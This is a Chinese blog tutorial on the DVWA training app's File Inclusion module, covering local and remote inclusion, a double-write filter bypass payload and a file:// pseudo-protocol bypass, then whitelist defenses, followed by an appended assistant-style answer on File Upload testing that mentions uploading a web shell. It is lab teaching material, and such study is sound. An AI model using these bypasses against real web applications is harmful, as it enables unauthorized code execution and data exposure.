DVWA-File Inclusion模块展开实验

5 篇文章 0 订阅
4 篇文章 0 订阅

File inclusion,文件包含(漏洞)。程序开发人员通常出于灵活性的考虑,会将被包含的文件设置成变量,然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件,造成文件包含漏洞。文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞。

1、Low等级本地文件包含和远程文件包含;

我们在C盘创建一个txt名为key,内容为123456,通过DVWA的low级别进行包含,在浏览器page=后面加上txt的路径,可以看到页面直接输出123456

可以看到成功输出test.txt文件内容,接下来测试远程文件包含,注意,需要allow_url_include为on:

下面测试远程包含,由于搭建的服务也是在本地所以直接使用IP访问,不过访问的ip根目录为phpstudy的网站根目录,所以测试文件要放在根目录下面,例:http://192.168.196.1/test.php,可以看到成功包含进来:

把文件放在php的根目录那,如果不知道,我们可以打开phpstudy

文件test.php的内容:

在新建一个key.txt文件:

2、Medium等级本地文件包含和远程文件包含;

修改等级:

查看源码:

可以看到使用str_replace()函数将http:// https:// ../ ..\替换成空字符

我们可以通过使用双写绕过替换规则,

例如写成page=hthttp://tp://192.168.196.1/phpinfo.php时,函数会将http://删除,其实等于page=http://192.168.196.1/phpinfo.php,先在kali写入php探针,成功执行远程命令

在新建一个key.txt文件(同上目录):

3、High级别本地文件包含和远程文件包含;

修改等级:

我们可以查看其源码:

可以看到:使用fnmatch()确保$file是以file开头,我们可以通过利用file伪协议绕过

4、Impossible等级的机制以及修复、防御文件包含的方法。

先修改等级

源码:

可以看到,这里用if语句来判断用户输入的数据是否是include.php,通过定义白名单进行防范

常见防范措施

1、基于白名单进行防御,确保page参数传递的只能是固定的文件名
2、文件包含可以与文件上传结合,可以上传图片文件,执行代码。要全面防御

好的,我可以为您提供一些关于DVWAFile Upload模块实验步骤。首先,您需要了解一下DVWA是什么。DVWA(Damn Vulnerable Web Application)是一个用于练习网络渗透测试技能的虚拟机环境,其中包含多个漏洞,可供练习和学习。其中就包括File Upload模块。 以下是一些关于DVWAFile Upload模块实验步骤: 1. 首先,您需要在本地安装DVWA,并启动它。您可以使用XAMPP等工具来安装和启动DVWA。 2. 登录到DVWA并选择File Upload模块。 3. 选择一个文件并上传。您可以尝试上传一些不同类型的文件,如图片、文本文件、PDF等。 4. 观察上传后的结果。如果上传成功,您应该能够看到一个已上传的文件列表,并且您上传的文件应该显示在列表中。 5. 试着上传一些恶意文件,如包含恶意代码的文件。观察上传后的结果并尝试分析它们的影响。 6. 尝试绕过文件上传的限制。您可以尝试通过修改文件扩展名、使用特殊字符或修改HTTP报文来绕过文件类型和大小的限制。 7. 尝试利用文件上传漏洞进行攻击。您可以尝试上传一个包含Web Shell的文件,并尝试通过Web Shell来获取系统权限。 需要注意的是,您在进行实验时应该遵循合法的道德和法律标准,不得以任何非法或不道德的方式使用这些技术。同时,您应该在安全的环境中进行实验,以避免对其他人或组织的系统造成损害。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值